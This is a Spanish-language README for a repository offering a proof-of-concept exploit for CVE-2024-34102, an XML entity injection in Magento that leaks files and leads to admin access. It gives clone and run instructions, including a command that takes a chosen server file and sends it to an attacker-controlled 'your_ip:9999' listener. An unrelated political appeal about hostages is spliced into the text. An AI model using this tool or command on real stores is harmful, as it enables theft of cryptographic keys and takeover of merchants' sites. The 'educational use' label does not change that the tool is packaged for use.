
Prueba de concepto del exploit para CVE-2024-34102, una inyección crítica de entidades XML en Magento que permite la exfiltración de archivos sensibles y el acceso no autorizado al administrador. Solo para uso educativo.
Exigimos el regreso seguro de todos los ciudadanos que han sido tomados como rehenes por el grupo terrorista Hamás. No descansaremos hasta que cada rehén sea liberado y regrese a casa sano y salvo. Puedes ayudar a traerlos de vuelta a casa. https://stories.bringthemhomenow.net/
Este repositorio contiene un exploit de prueba de concepto (PoC) para la vulnerabilidad crítica de inyección de entidades XML (CVE-2024-34102) en Magento. Esta vulnerabilidad permite la exfiltración de archivos sensibles, que luego pueden aprovecharse para obtener acceso no autorizado a las funcionalidades administrativas de Magento. Este exploit está diseñado con fines educativos y debe utilizarse de manera responsable.
Magento es una de las soluciones de comercio electrónico más populares utilizadas a nivel mundial. En junio de 2024, se descubrió un problema crítico de inyección de entidades XML sin autenticación previa, identificado como CVE-2024-34102. Esta vulnerabilidad puede tener consecuencias graves, incluida la exfiltración del archivo app/etc/env.php de Magento, que contiene claves criptográficas utilizadas para firmar JWTs.
requests (pip install requests)Clona el repositorio:
git clone https://github.com/yourusername/CVE-2024-34102-exploit.git
cd CVE-2024-34102-exploit
Ejecuta el script con los argumentos necesarios:
python cve_2024_34102_exploit.py --target-url http://example.com --target-file /etc/hosts --exfil-url your_ip:9999
--target-url: La URL de la instancia de Magento objetivo.--target-file: La ruta del archivo en el servidor objetivo a exfiltrar.--exfil-url: La URL para recibir los datos exfiltrados.python cve_2024_34102_exploit.py --target-url http://example.com --target-file /etc/hosts --exfil-url your_ip:9999